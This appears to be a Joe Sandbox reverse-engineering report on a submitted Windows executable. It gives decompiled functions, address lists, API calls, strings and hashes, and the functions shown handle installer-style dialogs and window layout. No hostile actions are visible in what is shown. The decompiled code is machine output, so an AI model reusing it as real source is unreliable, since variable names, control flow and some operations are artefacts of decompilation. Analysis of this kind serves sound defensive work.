											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00BA9F8F(__ecx, __ebp) = __ebp - 0xbc8c;
											__ebp - 0xac8c = E00BC5646(__ebp - 0xac8c, __ebp - 0xbc8c);
											_pop(__ecx);
											_pop(__ecx);
											__ebp - 0xac8c = E00BABC0F(__eflags, __ebp - 0xac8c);
											__ecx =  *(__ebp - 0x1c3c) & 0x0000ffff;
											__eax = __ebp - 0x1c3c;
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff);
											__edx = __ebp - 0x9c8c;
											__esi = __ebp - 0xac8c;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c;
											 *(__ebp - 0x9c8c) & 0x0000ffff =  ~( *(__ebp - 0x9c8c) & 0x0000ffff);
											asm("sbb eax, eax");
											__eax =  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c;
											 *(__ebp - 0xac8c) & 0x0000ffff =  ~( *(__ebp - 0xac8c) & 0x0000ffff);
											__eax = __ebp - 0x15c8c;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi;
											E00BBA564(__ebp - 0x15c8c) = __ebp - 0x2c3c;
											__ebp - 0xbc8c = E00BB9B4C(__ecx, __edi, __ebp - 0xbc8c, __ebp - 0x2c3c,  ~( *(__ebp - 0xac8c) & 0x0000ffff) & __esi, __ebp - 0xbc8c,  ~( *(__ebp - 0x9c8c) & 0x0000ffff) & __ebp - 0x00009c8c,  ~( *(__ebp - 0x1c3c) & 0x0000ffff) & __ebp - 0x00001c3c); // executed
											__eflags =  *(__ebp - 0xcc8c);
											if( *(__ebp - 0xcc8c) != 0) {
												__eax = __ebp - 0xcc8c;
												SHChangeNotify(0x1000, 5, __ebp - 0xcc8c, __edi); // executed
											}
											goto L165;
										}
										goto L160;
									}
								}
							case 0xb:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0xbe9470 = 1;
								}
								goto L165;
							case 0xc:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eax = E00BC6280( *(__ebp - 0x5c84) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0xbe7444 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0xbe7445 = 1;
									} else {
										__eax = 0;
										 *0xbe7444 = __al;
										 *0xbe7445 = __al;
									}
								}
								goto L165;
							case 0xd:
								 *0xbfdc91 = 1;
								__eax = __eax + 0xbfdc91;
								_t110 = __esi + 0x39;
								 *_t110 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t110;
								__ebp = 0xffffa37c;
								if( *_t110 != 0) {
									_t112 = __ebp - 0x5c84; // 0xffff46f8
									__eax = _t112;
									_push(_t112);
									 *0xbdd5fc = E00BB16F4();
								}
								goto L165;
						}
						L4:
						_t218 = E00BBA647(_t218, _t293);
						_t293 = _t293 + 0x2000;
						_t289 = _t289 - 1;
						if(_t289 != 0) {
							goto L4;
						} else {
							_t294 = _t289;
							goto L6;
						}
						L165:
						_push(0x1000);
						_t203 = _t298 - 0xe; // 0xffffa36e
						_t204 = _t298 - 0xd; // 0xffffa36f
						_t205 = _t298 - 0x5c84; // 0xffff46f8
						_t206 = _t298 - 0xfc8c; // 0xfffea6f0
						_push( *((intOrPtr*)(_t298 + 0xc)));
						_t213 = E00BBA986();
						_t274 =  *((intOrPtr*)(_t298 + 0x10));
						 *((intOrPtr*)(_t298 + 0xc)) = _t213;
					} while (_t213 != 0);
				}
			}

0x00bbbd35
0x00bbbd3a
0x00bbbd3f
0x00bbbd44
0x00bbbd4d
0x00bbc917
0x00bbc91a
0x00bbc924
0x00bbc924
0x00bbbd53
0x00bbbd5b
0x00bbbd5f
0x00bbbd66
0x00bbbd6d
0x00bbbd6e
0x00bbbd71
0x00bbbd78
0x00bbbd7d
0x00bbbd84
0x00bbbd89
0x00bbbd8b
0x00bbbd91
0x00bbbd97
0x00bbbd97
0x00000000
0x00bbbdac
0x00bbbdc3
0x00bbbdc7
0x00000000
0x00bbbdc9
0x00000000
0x00bbbdc9
0x00bbbdc7
0x00bbbdd1
0x00000000
0x00000000
0x00bbbdd7
0x00000000
0x00bbbdde
0x00bbbde1
0x00bbbdf4
0x00bbbe1a
0x00bbbe2e
0x00bbbe31
0x00bbbe3c
0x00bbbf80
0x00bbbf80
0x00bbbf88
0x00bbbf8e
0x00bbbf93
0x00bbbf95
0x00000000
0x00000000
0x00bbbe4e
0x00bbbe54
0x00bbbe5a
0x00bbbf00
0x00bbbf07
0x00bbbf0d
0x00bbbf10
0x00000000
0x00000000
0x00bbbf19
0x00bbbf1f
0x00bbbf21
0x00000000
0x00bbbf23
0x00bbbf23
0x00bbbf25
0x00bbbf26
0x00bbbf2a
0x00bbbf3e
0x00bbbf43
0x00bbbf4d
0x00bbbf53
0x00bbbf56
0x00bbbf28
0x00bbbf28
0x00bbbf29
0x00000000
0x00bbbf58
0x00bbbf66
0x00bbbf6c
0x00bbbf6e
0x00bbbf7a
0x00bbbf7a
0x00000000
0x00bbbf6e
0x00bbbf56
0x00bbbf21
0x00bbbe6f
0x00bbbe7c
0x00bbbe8d
0x00bbbe90
0x00bbbe93
0x00bbbea6
0x00bbbead
0x00bbbeb2
0x00bbbeb4
0x00000000
0x00000000
0x00bbbeba
0x00bbbec1
0x00bbbec6
0x00bbbecb
0x00bbbed7
0x00bbbedc
0x00bbbedf
0x00bbbee6
0x00bbbee8
0x00bbbee9
0x00bbbef3
0x00bbbef9
0x00bbbefa
0x00000000
0x00bbbefa
0x00bbbe9c
0x00bbbea2
0x00bbbea4
0x00000000
0x00000000
0x00000000
0x00bbbea4
0x00bbbf9b
0x00bbbfa5
0x00bbbfa5
0x00000000
0x00000000
0x00bbbfaf
0x00bbbfb1
0x00000000
0x00bbbfb7
0x00bbbfb7
0x00bbbfbc
0x00bbbfbe
0x00bbbfc1
0x00bbbfc3
0x00bbbfd0
0x00bbbfd5
0x00bbbfd6
0x00bbbfd6
0x00bbbfd7
0x00bbbfda
0x00bbbfdc
0x00bbbfe6
0x00bbbfe9
0x00bbbfef
0x00bbbff1
0x00bbbfde
0x00bbbfde
0x00bbbfde
0x00bbbff6
0x00bbbff8
0x00bbc001
0x00bbc001
0x00bbc004
0x00bbc009
0x00bbc012
0x00bbc013
0x00bbc019
0x00bbc01e
0x00bbc021
0x00bbc023
0x00bbc03c
0x00bbc03c
0x00bbc03e
0x00bbc045
0x00bbc04a
0x00000000
0x00bbc03e
0x00bbc025
0x00bbc02a
0x00bbc02c
0x00bbc02e
0x00bbc02e
0x00bbc030
0x00bbc030
0x00bbc035
0x00bbc03a
0x00bbc03b
0x00000000
0x00bbc03b
0x00000000
0x00bbc050
0x00bbc052
0x00bbc062
0x00bbc062
0x00000000
0x00000000
0x00bbc06d
0x00bbc06f
0x00000000
0x00000000
0x00bbc075
0x00bbc07c
0x00000000
0x00000000
0x00bbc082
0x00bbc084
0x00bbc08a
0x00bbc08c
0x00bbc093
0x00bbc094
0x00bbc09b
0x00bbc09d
0x00bbc09d
0x00bbc0a4
0x00bbc0a9
0x00bbc0af
0x00bbc0b1
0x00000000
0x00bbc0b7
0x00bbc0b7
0x00bbc0ba
0x00bbc0bc
0x00bbc0bd
0x00bbc0c0
0x00bbc0e9
0x00bbc0e9
0x00bbc0ec
0x00bbc1d1
0x00bbc1da
0x00bbc1df
0x00bbc1df
0x00bbc1e1
0x00bbc1e1
0x00bbc1e3
0x00bbc1e5
0x00bbc1ec
0x00bbc1f1
0x00bbc1f2
0x00bbc1f3
0x00bbc1f5
0x00bbc1f7
0x00bbc1fb
0x00bbc1fd
0x00bbc1fd
0x00bbc1ff
0x00bbc1ff
0x00bbc1fb
0x00bbc203
0x00bbc209
0x00bbc216
0x00bbc21d
0x00bbc22d
0x00bbc237
0x00bbc245
0x00bbc24b
0x00bbc253
0x00bbc258
0x00bbc259
0x00bbc25a
0x00bbc25c
0x00bbc270
0x00bbc270
0x00000000
0x00bbc25c
0x00bbc0f2
0x00bbc0f5
0x00bbc102
0x00bbc102
0x00bbc105
0x00bbc107
0x00bbc108
0x00bbc10a
0x00bbc10b
0x00bbc110
0x00bbc115
0x00bbc11b
0x00bbc11d
0x00bbc11f
0x00bbc122
0x00bbc129
0x00bbc12a
0x00bbc130
0x00bbc131
0x00bbc134
0x00bbc135
0x00bbc136
0x00bbc13b
0x00bbc13e
0x00bbc144
0x00bbc14d
0x00bbc150
0x00bbc155
0x00bbc157
0x00bbc159
0x00bbc15b
0x00bbc15b
0x00bbc15d
0x00bbc15d
0x00bbc15f
0x00bbc15f
0x00bbc167
0x00bbc16e
0x00bbc170
0x00bbc177
0x00bbc17d
0x00bbc17f
0x00bbc180
0x00bbc188
0x00bbc197
0x00bbc197
0x00bbc188
0x00bbc1a2
0x00bbc1a4
0x00bbc1b3
0x00bbc1b9
0x00bbc1bf
0x00bbc1ca
0x00bbc1ca
0x00000000
0x00bbc1bf
0x00bbc0f7
0x00bbc0fc
0x00000000
0x00000000
0x00000000
0x00bbc0fc
0x00bbc0c2
0x00bbc0c6
0x00000000
0x00000000
0x00bbc0c8
0x00bbc0cb
0x00bbc0cd
0x00bbc0d0
0x00000000
0x00000000
0x00bbc0df
0x00000000
0x00bbc0df
0x00000000
0x00bbc27b
0x00bbc27c
0x00bbc281
0x00bbc283
0x00bbc286
0x00bbc286
0x00000000
0x00bbc2bc
0x00bbc2c3
0x00bbc2c5
0x00bbc2c5
0x00bbc2c7
0x00bbc2f6
0x00bbc2f6
0x00bbc2fc
0x00000000
0x00bbc2fc
0x00bbc2c9
0x00bbc2c9
0x00bbc2cc
0x00bbc2e5
0x00bbc2eb
0x00bbc2eb
0x00000000
0x00bbc2eb
0x00bbc2ce
0x00bbc2ce
0x00bbc2d1
0x00000000
0x00000000
0x00bbc2d3
0x00bbc2d3
0x00bbc2d6
0x00000000
0x00000000
0x00bbc2dc
0x00000000
0x00000000
0x00bbc349
0x00bbc34c
0x00000000
0x00000000
0x00bbc34e
0x00bbc35a
0x00bbc35f
0x00bbc360
0x00bbc361
0x00bbc363
0x00000000
0x00000000
0x00bbc365
0x00000000
0x00000000
0x00bbc3ab
0x00bbc3ae
0x00bbc52f
0x00bbc52f
0x00bbc532
0x00bbc538
0x00bbc53f
0x00bbc541
0x00bbc541
0x00bbc54b
0x00bbc54b
0x00000000
0x00bbc532
0x00bbc3b4
0x00bbc3ba
0x00bbc3c8
0x00bbc3d4
0x00bbc3d6
0x00bbc3d8
0x00bbc3dd
0x00bbc3dd
0x00bbc3f5
0x00bbc402
0x00bbc407
0x00bbc409
0x00000000
0x00000000
0x00bbc3db
0x00bbc3db
0x00bbc3dc
0x00bbc3dc
0x00bbc415
0x00bbc41b
0x00bbc423
0x00000000
0x00000000
0x00bbc429
0x00bbc430
0x00000000
0x00000000
0x00bbc436
0x00bbc438
0x00bbc43f
0x00bbc445
0x00bbc447
0x00bbc448
0x00bbc44d
0x00bbc44e
0x00bbc44f
0x00bbc451
0x00bbc4a5
0x00bbc4a5
0x00bbc4ad
0x00bbc4bb
0x00bbc4cc
0x00bbc4da
0x00bbc4da
0x00bbc4e6
0x00bbc4eb
0x00bbc4ed
0x00bbc4fd
0x00bbc507
0x00bbc50c
0x00bbc50f
0x00000000
0x00bbc515
0x00bbc51a
0x00bbc51a
0x00bbc51c
0x00bbc523
0x00bbc529
0x00000000
0x00bbc529
0x00bbc50f
0x00bbc453
0x00bbc455
0x00bbc457
0x00bbc45e
0x00000000
0x00000000
0x00bbc460
0x00bbc462
0x00bbc468
0x00bbc468
0x00bbc46c
0x00000000
0x00000000
0x00bbc46e
0x00bbc46f
0x00bbc475
0x00bbc478
0x00bbc47a
0x00bbc47d
0x00000000
0x00000000
0x00000000
0x00bbc47f
0x00bbc48c
0x00bbc496
0x00bbc49b
0x00bbc49b
0x00bbc49d
0x00000000
0x00000000
0x00bbc557
0x00bbc55a
0x00bbc55c
0x00bbc563
0x00bbc565
0x00bbc56b
0x00bbc56c
0x00bbc571
0x00bbc572
0x00bbc572
0x00bbc577
0x00bbc57a
0x00bbc580
0x00bbc580
0x00bbc585
0x00000000
0x00000000
0x00bbc591
0x00bbc594
0x00bbc375
0x00bbc375
0x00000000
0x00bbc375
0x00bbc59a
0x00bbc366
0x00bbc366
0x00bbc36c
0x00bbc36d
0x00bbc370
0x00000000
0x00000000
0x00bbc5a1
0x00bbc5a4
0x00000000
0x00000000
0x00bbc5aa
0x00bbc5ac
0x00bbc5b3
0x00bbc5bb
0x00bbc5c1
0x00bbc5c6
0x00bbc5c9
0x00bbc5fe
0x00bbc603
0x00bbc609
0x00bbc60a
0x00bbc60f
0x00bbc5cb
0x00bbc5cb
0x00bbc5ce
0x00bbc5d4
0x00bbc5ea
0x00bbc5ef
0x00bbc5f0
0x00bbc5f5
0x00bbc5d6
0x00bbc5d6
0x00bbc5db
0x00bbc5dc
0x00bbc5e1
0x00bbc5e1
0x00bbc5d4
0x00bbc616
0x00bbc618
0x00bbc61f
0x00bbc62d
0x00bbc634
0x00bbc639
0x00bbc63a
0x00bbc63b
0x00bbc63d
0x00bbc63e
0x00bbc645
0x00bbc695
0x00bbc69a
0x00bbc69c
0x00000000
0x00000000
0x00bbc6a2
0x00bbc6a4
0x00bbc6aa
0x00bbc6b1
0x00000000
0x00000000
0x00bbc6b3
0x00bbc6b5
0x00bbc6b6
0x00bbc6b6
0x00bbc6b9
0x00bbc6bc
0x00bbc6c6
0x00bbc6c6
0x00bbc6c8
0x00bbc6ca
0x00bbc6d4
0x00bbc6d9
0x00bbc6db
0x00bbc719
0x00bbc71c
0x00bbc71c
0x00bbc71e
0x00bbc71f
0x00bbc71f
0x00000000
0x00bbc71f
0x00bbc6dd
0x00bbc6df
0x00bbc6e0
0x00bbc6e2
0x00bbc6e5
0x00bbc6fa
0x00bbc6fc
0x00bbc6fd
0x00bbc6fd
0x00bbc700
0x00bbc700
0x00bbc705
0x00bbc706
0x00bbc70c
0x00bbc70c
0x00bbc70d
0x00bbc712
0x00bbc713
0x00bbc714
0x00000000
0x00bbc714
0x00bbc6e7
0x00bbc6ee
0x00bbc6f1
0x00bbc6f2
0x00000000
0x00bbc6f2
0x00bbc6be
0x00bbc6c0
0x00bbc6c1
0x00bbc6c4
0x00000000
0x00000000
0x00000000
0x00bbc721
0x00bbc721
0x00bbc724
0x00bbc724
0x00bbc729
0x00bbc72b
0x00bbc72d
0x00bbc72d
0x00bbc72f
0x00bbc72f
0x00000000
0x00bbc647
0x00bbc64e
0x00bbc65a
0x00bbc660
0x00bbc661
0x00bbc662
0x00bbc667
0x00bbc66a
0x00bbc66c
0x00bbc672
0x00bbc674
0x00bbc682
0x00bbc687
0x00bbc688
0x00bbc688
0x00bbc732
0x00bbc732
0x00bbc73a
0x00bbc73f
0x00bbc749
0x00bbc750
0x00bbc750
0x00bbc75d
0x00bbc764
0x00bbc769
0x00bbc771
0x00bbc77d
0x00bbc77d
0x00bbc78a
0x00bbc78f
0x00bbc797
0x00bbc7a1
0x00bbc7ae
0x00bbc7b5
0x00bbc7b5
0x00bbc7c1
0x00bbc7c8
0x00bbc7cd
0x00bbc7d5
0x00bbc7db
0x00bbc7dc
0x00bbc7dd
0x00bbc7df
0x00bbc7df
0x00bbc7f4
0x00bbc7f9
0x00bbc805
0x00bbc807
0x00bbc818
0x00bbc825
0x00000000
0x00bbc809
0x00bbc814
0x00bbc816
0x00bbc82a
0x00bbc82a
0x00bbc82c
0x00bbc832
0x00bbc838
0x00bbc846
0x00bbc84b
0x00bbc84c
0x00bbc854
0x00bbc859
0x00bbc860
0x00bbc866
0x00bbc868
0x00bbc86e
0x00bbc874
0x00bbc876
0x00bbc87f
0x00bbc882
0x00bbc884
0x00bbc88d
0x00bbc890
0x00bbc896
0x00bbc899
0x00bbc8a2
0x00bbc8b1
0x00bbc8b6
0x00bbc8be
0x00bbc8c1
0x00bbc8cf
0x00bbc8cf
0x00000000
0x00bbc8be
0x00000000
0x00bbc816
0x00bbc807
0x00000000
0x00bbc8d7
0x00bbc8da
0x00bbc8dc
0x00bbc8dc
0x00000000
0x00000000
0x00bbc308
0x00bbc310
0x00bbc316
0x00bbc319
0x00bbc33d
0x00bbc31b
0x00bbc31b
0x00bbc31e
0x00bbc331
0x00bbc320
0x00bbc320
0x00bbc322
0x00bbc327
0x00bbc327
0x00bbc31e
0x00000000
0x00000000
0x00bbc381
0x00bbc382
0x00bbc387
0x00bbc387
0x00bbc387
0x00bbc38a
0x00bbc38f
0x00bbc395
0x00bbc395
0x00bbc39b
0x00bbc3a1
0x00bbc3a1
0x00000000
0x00000000
0x00bbbd98
0x00bbbd9a
0x00bbbd9f
0x00bbbda5
0x00bbbda8
0x00000000
0x00bbbdaa
0x00bbbdaa
0x00000000
0x00bbbdaa
0x00bbc8e3
0x00bbc8e3
0x00bbc8e8
0x00bbc8ec
0x00bbc8f0
0x00bbc8f7
0x00bbc8fe
0x00bbc901
0x00bbc906
0x00bbc909
0x00bbc90c
0x00bbc916

APIs

__EH_prolog.LIBCMT ref: 00BBBD3A

Part of subcall function 00BBA986: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00BBAA4E

SetWindowTextW.USER32(?,?), ref: 00BBC062
_wcsrchr.LIBVCRUNTIME ref: 00BBC1EC
GetDlgItem.USER32(?,00000066), ref: 00BBC227
SetWindowTextW.USER32(00000000,?), ref: 00BBC237
SendMessageW.USER32(00000000,00000143,00000000,00BE9472), ref: 00BBC245
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00BBC270

Strings

%s.%d.tmp, xrefs: 00BBBF31
<br>, xrefs: 00BBBFC5
Software\Microsoft\Windows\CurrentVersion, xrefs: 00BBC10B
ProgramFilesDir, xrefs: 00BBC136

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 9f3a6e54280afa29e1966764b66a5df126f29df8291243a4dca3cc0801f5b908
Instruction ID: f68583f3a14e894c2bea221f5d7c58b854c614e363a93ed02ec12c6cdc3d7a83
Opcode Fuzzy Hash: 9f3a6e54280afa29e1966764b66a5df126f29df8291243a4dca3cc0801f5b908
Instruction Fuzzy Hash: 22E14B72900159ABEB24EBA4DD85EFEB7FCEB05350F4040E6F555E6051EFB09B848B60

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD9D8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00BAD9D8(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00BA3FD6( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00BB14F2( &_v2208,  &_v2288, 0x50);
				_t96 = E00BC3470( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0xbdd5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E00BAD02E(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E00BAD0B1(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048); // executed
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xc01150(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0xc01150(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0xbdd154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xbd36b8
							_t151 = E00BC5D20( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0xbd36b8
								if(E00BAD208(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048); // executed
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0xbdd5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}

0x00bad9f0
0x00bad9fa
0x00bad9fe
0x00bada03
0x00bada15
0x00bada1f
0x00bada24
0x00bada2b
0x00bada2e
0x00bada32
0x00bada38
0x00bada95
0x00badaad
0x00badab5
0x00badab9
0x00badac5
0x00badad7
0x00badade
0x00badae2
0x00badae5
0x00badaed
0x00badaf3
0x00badaf9
0x00badb9c
0x00badb9c
0x00badba4
0x00badbd5
0x00badbd5
0x00badbdb
0x00badbe6
0x00badbe8
0x00badbee
0x00badbf0
0x00badbf6
0x00badca8
0x00badca8
0x00badca8
0x00badbfc
0x00badc96
0x00badc03
0x00badc09
0x00000000
0x00000000
0x00badc15
0x00badc1f
0x00badc34
0x00badc39
0x00badc3c
0x00badc52
0x00badc5a
0x00badc5c
0x00badc5d
0x00badc65
0x00badc77
0x00badc7e
0x00badc87
0x00badc8d
0x00badc8f
0x00badc93
0x00000000
0x00000000
0x00badc95
0x00badc95
0x00badc95
0x00000000
0x00badc96
0x00badb07
0x00000000
0x00000000
0x00badb14
0x00badb17
0x00badb20
0x00badb25
0x00badb2b
0x00badb2f
0x00badb30
0x00badb36
0x00badb40
0x00badb47
0x00badb50
0x00badb54
0x00badb58
0x00badb5a
0x00badb5a
0x00badb5e
0x00badb60
0x00badb60
0x00badb86
0x00badb92
0x00badb98
0x00000000
0x00bada3a
0x00bada3a
0x00bada3f
0x00bada42
0x00bada45
0x00bada4d
0x00bada52
0x00bada57
0x00bada68
0x00bada72
0x00bada7f
0x00bada7f
0x00bada72
0x00bada85
0x00bada85
0x00bada89
0x00bada8a
0x00bada8d
0x00bada8d
0x00000000
0x00bada3f

APIs

_swprintf.LIBCMT ref: 00BAD9FE

Part of subcall function 00BA3FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA3FE9

Part of subcall function 00BB14F2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BDFEE8,?,00BAD142,00000000,?,00000050,00BDFEE8), ref: 00BB150F

_strlen.LIBCMT ref: 00BADA1F
SetDlgItemTextW.USER32(?,00BDD154,?), ref: 00BADA7F
GetWindowRect.USER32(?,?), ref: 00BADAB9
GetClientRect.USER32(?,?), ref: 00BADAC5
GetWindowLongW.USER32(?,000000F0), ref: 00BADB65
GetWindowRect.USER32(?,?), ref: 00BADB92
SetWindowTextW.USER32(?,?), ref: 00BADBD5
GetSystemMetrics.USER32(00000008), ref: 00BADBDD
GetWindow.USER32(?,00000005), ref: 00BADBE8
GetWindowRect.USER32(00000000,?), ref: 00BADC15
GetWindow.USER32(00000000,00000002), ref: 00BADC87

Strings

$%s:, xrefs: 00BAD9F2
CAPTION, xrefs: 00BADBB7
t, xrefs: 00BADB65
d, xrefs: 00BADAE5

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$t
API String ID: 2407758923-3075788733
Opcode ID: ca0ca2a006a460b229cd2ed4e90aafe74956d970f978c65b6a5d794e2c9971bb
Instruction ID: 3b569089cb92e111f71b4a533858df05599e8cd97a6b103df366474a411e1e85
Opcode Fuzzy Hash: ca0ca2a006a460b229cd2ed4e90aafe74956d970f978c65b6a5d794e2c9971bb
Instruction Fuzzy Hash: 5681BF72208341AFD714DF68CC89F6FBBE9EB89714F05092DFA85A3290D674E805CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD281 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00BAD281(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t212;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
